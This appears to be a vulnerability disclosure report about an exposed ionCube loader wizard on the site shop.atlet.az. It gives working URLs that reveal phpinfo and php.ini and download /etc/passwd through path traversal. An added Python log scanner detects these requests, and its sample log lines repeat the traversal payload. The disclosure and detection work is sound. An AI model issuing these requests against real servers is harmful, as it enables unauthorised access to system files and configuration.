Detailed information
An attacker can obtain the output of phpinfo() and the contents of php.ini, and also has the option to download any file from the server.
http://www.shop.atlet.az/ioncube/loader-wizard.php?page=phpinfo
http://www.shop.atlet.az/ioncube/loader-wizard.php?page=phpconfig
http://www.shop.atlet.az/ioncube/loader-wizard.php?page=phpconfig&ininame=../../../../../../../etc/passwd&download=1
Detailed information: https://firefart.at/post/multiple-vulnerabilities-in-ioncube-loader-wizard/
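To check whether these endpoints have already been requested on a server, the access log can be searched for the three request patterns listed above. The following is an added example and not part of the original report; it assumes a combined-format access log, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify_request(target):
    """Return a finding label for a request target, or None if unrelated."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/loader-wizard.php"):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    page = params.get("page", [""])[0].lower()
    ininame = params.get("ininame", [None])[0]
    if ininame is not None:
        # parse_qs decoded once; decode again so double-encoded input is seen.
        decoded = unquote(ininame).replace("\\", "/")
        if ".." in decoded.split("/") or decoded.startswith("/"):
            return "ininame-path-traversal"
        return "ininame-file-request"
    if page in ("phpinfo", "phpconfig"):
        return "info-disclosure:" + page
    return "wizard-access"

def scan(lines):
    """Yield (line_number, label, target) for each log line that matches."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        label = classify_request(match.group(1))
        if label:
            yield number, label, match.group(1)

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Dec/2016:02:20:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "-"',
    '192.0.2.10 - - [12/Dec/2016:02:21:07 +0000] "GET /ioncube/loader-wizard.php?page=phpinfo HTTP/1.1" 200 81234 "-" "-"',
    '192.0.2.10 - - [12/Dec/2016:02:22:15 +0000] "GET /ioncube/loader-wizard.php?page=phpconfig HTTP/1.1" 200 4021 "-" "-"',
    '192.0.2.10 - - [12/Dec/2016:02:23:40 +0000] "GET /ioncube/loader-wizard.php?page=phpconfig&ininame=..%2F..%2Fetc%2Fpasswd&download=1 HTTP/1.1" 200 1833 "-" "-"',
    '198.51.100.7 - - [12/Dec/2016:02:24:02 +0000] "GET /ioncube/loader-wizard.php HTTP/1.1" 200 9100 "-" "-"',
]

if __name__ == "__main__":
    for number, label, target in scan(SAMPLE_LOG):
        print(f"line {number}: {label}: {target}")
```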
Comments
- 23 January 2017, 13:15
  Vulnerability status
  Do not have any information from source
- 15 December 2016, 11:46
  Vulnerability status
  Sent e-mail to source about vulnerability
- 14 December 2016, 13:25
  Added points to vulnerability
  Moderator gave 7 points out of 10 to vulnerability
- 14 December 2016, 13:19
  Vulnerability status
  Confirmed by Moderator
- 12 December 2016, 02:25
  Vulnerability added
  Vulnerability added to BUGemot